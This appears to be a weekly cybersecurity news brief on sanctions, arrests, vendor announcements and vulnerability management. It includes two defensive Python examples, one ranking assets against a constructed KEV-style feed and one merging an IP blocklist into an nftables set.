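Using the KEV catalog in practice means joining it against what you actually run and acting on the due dates. The following is an added example, not CISA code: it indexes a KEV-style JSON feed by vendor and product, matches it against a constructed asset inventory, and ranks the results with overdue items first and ransomware-linked entries next. The field names follow the published KEV JSON schema (`cveID`, `vendorProject`, `product`, `dateAdded`, `dueDate`, `knownRansomwareCampaignUse`), but the entries, dates and inventory below are constructed for illustration and are not copied from the live catalog; use the real feed from CISA for anything operational.

```python
"""Rank an asset inventory against CISA's Known Exploited Vulnerabilities (KEV)
feed by due date and known ransomware use.

Added example, not CISA code. The feed fields match the published KEV JSON
schema; the entries, dates and inventory below are constructed and are not
copied from the catalog."""
import json
from datetime import date

# Constructed KEV-style feed (same shape as the real JSON download).
KEV_SAMPLE = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2025-61757", "vendorProject": "Oracle", "product": "Fusion Middleware",
     "dateAdded": "2025-11-21", "dueDate": "2025-12-12", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-13223", "vendorProject": "Google", "product": "Chromium V8",
     "dateAdded": "2025-11-19", "dueDate": "2025-12-10", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-58034", "vendorProject": "Fortinet", "product": "FortiWeb",
     "dateAdded": "2025-11-18", "dueDate": "2025-11-25", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-61882", "vendorProject": "Oracle", "product": "E-Business Suite",
     "dateAdded": "2025-10-06", "dueDate": "2025-10-27", "knownRansomwareCampaignUse": "Known"},
]})

# Constructed inventory: hostname -> (vendor, product) as the CMDB records them.
INVENTORY = {
    "erp-app-01": ("Oracle", "E-Business Suite"),
    "waf-edge-02": ("Fortinet", "FortiWeb"),
    "iam-prod-01": ("Oracle", "Fusion Middleware"),
    "build-runner-7": ("Ubuntu", "Linux"),
}


def load_kev(text: str) -> dict:
    """Index KEV entries by (vendor, product), case-folded for matching."""
    idx = {}
    for v in json.loads(text)["vulnerabilities"]:
        key = (v["vendorProject"].lower(), v["product"].lower())
        idx.setdefault(key, []).append(v)
    return idx


def prioritise(kev_text: str, inventory: dict, today_iso: str) -> list:
    """Return findings as (host, cveID, days_to_due, ransomware) tuples, sorted
    overdue first, then ransomware-linked, then nearest due date.
    A negative days_to_due means the BOD 22-01 deadline has already passed."""
    today = date.fromisoformat(today_iso)
    idx = load_kev(kev_text)
    findings = []
    for host, (vendor, product) in inventory.items():
        for v in idx.get((vendor.lower(), product.lower()), []):
            due = date.fromisoformat(v["dueDate"])
            findings.append((host, v["cveID"], (due - today).days,
                             v["knownRansomwareCampaignUse"] == "Known"))
    findings.sort(key=lambda f: (f[2] >= 0, not f[3], f[2]))
    return findings


if __name__ == "__main__":
    for host, cve, days, ransomware in prioritise(KEV_SAMPLE, INVENTORY, "2025-11-23"):
        flag = "OVERDUE" if days < 0 else f"{days}d left"
        print(f"{host:15} {cve:16} {flag:10} ransomware={ransomware}")
```

The weak link in any such join is the inventory's vendor and product strings, which rarely match CISA's spelling exactly; in practice the `(vendor, product)` key needs a mapping table maintained alongside the CMDB. Federal due dates are a floor for urgency, not a ceiling: an entry added with a seven-day deadline, as happened for the FortiWeb flaw this week, signals that CISA expects exploitation to be widespread.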
- A new integration between Proofpoint Satori and Microsoft Security Copilot is now generally available, enhancing security operations with real-time threat intelligence. The Proofpoint Satori agent allows defenders to query the exploitation status of specific CVEs directly within the Security Copilot interface. By drawing on data from sources like the EPSS, CISA’s KEV catalog, and Proofpoint’s own sensor network, the agent helps security teams accurately identify and prioritize actively exploited vulnerabilities, accelerating remediation and improving risk-based vulnerability management.
- vendor www.proofpoint.com: Proofpoint Satori Emerging Threats Intelligence Agent Now Generally Available for Microsoft Security Copilot
- The Financial Services Information Sharing and Analysis Center (FS-ISAC) in the UK has become the new steward of the UK’s Financial Sector Cyber Collaboration Centre (FSCCC). This transition aims to expand threat intelligence sharing and strengthen incident response capabilities across the UK’s financial sector. By integrating the FSCCC’s public-private partnership model with FS-ISAC’s global intelligence network, the collaboration will provide a more unified and effective defense against cyber threats targeting financial institutions.
- vendor www.fsisac.com: FS-ISAC UK Becomes Steward of the UK’s Financial Sector Cyber Collaboration Centre (FSCCC)
- GreyNoise has introduced query-based blocklists, allowing security teams to dynamically block malicious IP addresses in real-time. This feature enables users to turn any GreyNoise Query Language (GNQL) query into a live, continuously updated feed for firewalls and other enforcement points. As attacker infrastructure rapidly changes, this capability provides a more responsive and configurable approach to perimeter defense compared to traditional static blocklists, helping organizations automate the blocking of activity tailored to their specific threat model.
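Both the bulletproof-hosting guidance above (curating malicious resource lists and filtering traffic) and the query-based blocklists come down to the same plumbing: take a feed of hostile addresses, normalise it, and hand it to an enforcement point. The following is an added example, not code from CISA, GreyNoise or any other source in this brief, and it does not call the GreyNoise API. It parses a constructed feed of IPs and CIDRs, merges duplicates and adjacent ranges, matches observed addresses against the result, and renders the set for nftables; the feed contents, the flow records and the choice of nftables as output are the author's assumptions.

```python
"""Turn a curated list of hostile IPs/CIDRs into a merged set usable by a
firewall, and match observed addresses against it.

Added example, not code from GreyNoise, CISA or the sources above; it does
not call any API. The feed text and the flow records are constructed
(documentation ranges); the nftables rendering is the author's choice."""
import ipaddress

# Constructed feed: one address or CIDR per line, '#' comments allowed.
SAMPLE_FEED = """\
# bulletproof-hosting ranges (constructed for the example)
203.0.113.0/25
203.0.113.128/25
198.51.100.17
198.51.100.17        # duplicate on purpose
192.0.2.0/26
not-an-ip
"""
# Constructed source addresses from a flow log.
SAMPLE_FLOWS = ["198.51.100.17", "203.0.113.200", "192.0.2.100", "192.0.2.7"]


def parse_feed(text: str) -> list:
    """Parse lines into network objects, skipping comments, blanks and junk."""
    nets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        try:
            nets.append(ipaddress.ip_network(line, strict=False))
        except ValueError:
            continue                      # in production: log the rejected line
    return nets


def merge(nets: list) -> list:
    """Collapse duplicates and adjacent ranges (two /25s become one /24).
    IPv4 and IPv6 are collapsed separately; the library requires one family."""
    v4 = [n for n in nets if n.version == 4]
    v6 = [n for n in nets if n.version == 6]
    return list(ipaddress.collapse_addresses(v4)) + list(ipaddress.collapse_addresses(v6))


def match(nets: list, ip: str):
    """Return the first network containing ip, or None if it is not listed."""
    addr = ipaddress.ip_address(ip)
    return next((n for n in nets if addr in n), None)


def hits(nets: list, ips: list) -> dict:
    """Map each observed address to its matching network (None if clean)."""
    return {ip: match(nets, ip) for ip in ips}


def render_nft_set(nets: list, name: str = "bph_v4") -> str:
    """Emit an nftables set definition with the merged elements."""
    elems = ", ".join(str(n) for n in nets)
    return (f"table inet filter {{\n  set {name} {{\n    type ipv4_addr\n"
            f"    flags interval\n    elements = {{ {elems} }}\n  }}\n}}\n")


if __name__ == "__main__":
    merged = merge(parse_feed(SAMPLE_FEED))
    for ip, net in hits(merged, SAMPLE_FLOWS).items():
        print(f"{ip:16} -> {net}")
    print(render_nft_set(merged))
```

Merging before loading matters for two reasons: firewalls have element limits, and a feed that is regenerated from a query changes continuously, so the smallest stable representation keeps reloads cheap. The `hits` function is the same check a defender would run retrospectively over a flow log to see whether listed infrastructure has already been talking to the network. For IPv6 entries a second set of type `ipv6_addr` would be rendered the same way.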
Wins #
- The U.S. Securities and Exchange Commission (SEC) has voluntarily dismissed its lawsuit against SolarWinds and its Chief Information Security Officer (CISO), Timothy Brown. The suit alleged that the company had defrauded investors by misrepresenting its cybersecurity posture prior to the 2020 supply chain attack. This dismissal is seen as a significant win for the cybersecurity community, easing concerns that CISOs could face personal liability for corporate security failures and removing a potential chilling effect on security disclosures.
- news cyberscoop.com: SEC drops case against SolarWinds tied to monumental breach
- news therecord.media: SEC voluntarily dismisses SolarWinds lawsuit
- In a coordinated international effort, the U.S., U.K., and Australia have imposed sanctions on Russia-based bulletproof hosting (BPH) provider Media Land and its affiliates. The company is accused of providing infrastructure to major ransomware groups like LockBit, BlackSuit, and Play, as well as supporting other cybercrime operations. This action targets the core enablers of the cybercrime ecosystem, aiming to disrupt their ability to operate and make it harder for threat actors to launch attacks with impunity. The Five Eyes nations also released a guide for network defenders to mitigate risks from BPH providers.
- news cyberscoop.com: Five Eyes just made life harder for bulletproof hosting providers
- news hackread.com: UK Exposes Bulletproof Hosting Operator Linked to LockBit and Evil Corp
- news securityaffairs.com: Coordinated sanctions hit Russian bulletproof hosting providers enabling top ransomware Ops
- The co-founders of the Samourai Wallet cryptocurrency mixing service have been sentenced to prison for operating an unlicensed money-transmitting business that laundered over $237 million in criminal proceeds. The platform’s features, such as ‘Whirlpool’ and ‘Ricochet,’ were designed to obscure transaction origins, making it a favored tool for cybercriminals involved in ransomware, darknet markets, and fraud. The sentencing represents a significant blow to the infrastructure that enables the financial side of cybercrime.
- news thecyberexpress.com: U.S. Sentences Samourai Wallet Founders for $237M Crypto Money Laundering Scheme
- personal newsletter.blockthreat.io: BlockThreat - Week 45, 2025
- Two UK teenagers, alleged members of the Scattered Spider threat group, have been arrested and charged in connection with the 2024 cyberattack on Transport for London (TfL). The individuals, Thalha Jubair and Owen Flowers, pleaded not guilty to charges under the Computer Misuse Act. This legal action represents a key step in holding members of the prolific, English-speaking cybercrime collective accountable for high-profile attacks that have caused significant disruption and financial losses.
- news thecyberexpress.com: Scattered Spider Teens Plead Not Guilty in UK Court
- news therecord.media: Two suspected Scattered Spider hackers plead not guilty over Transport for London cyberattack
Disclaimer #
The summaries in this brief are generated autonomously by an LLM based on provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
The brief is created in collaboration with BlackStork and is based on a free template.
Reach out if you have questions or suggestions.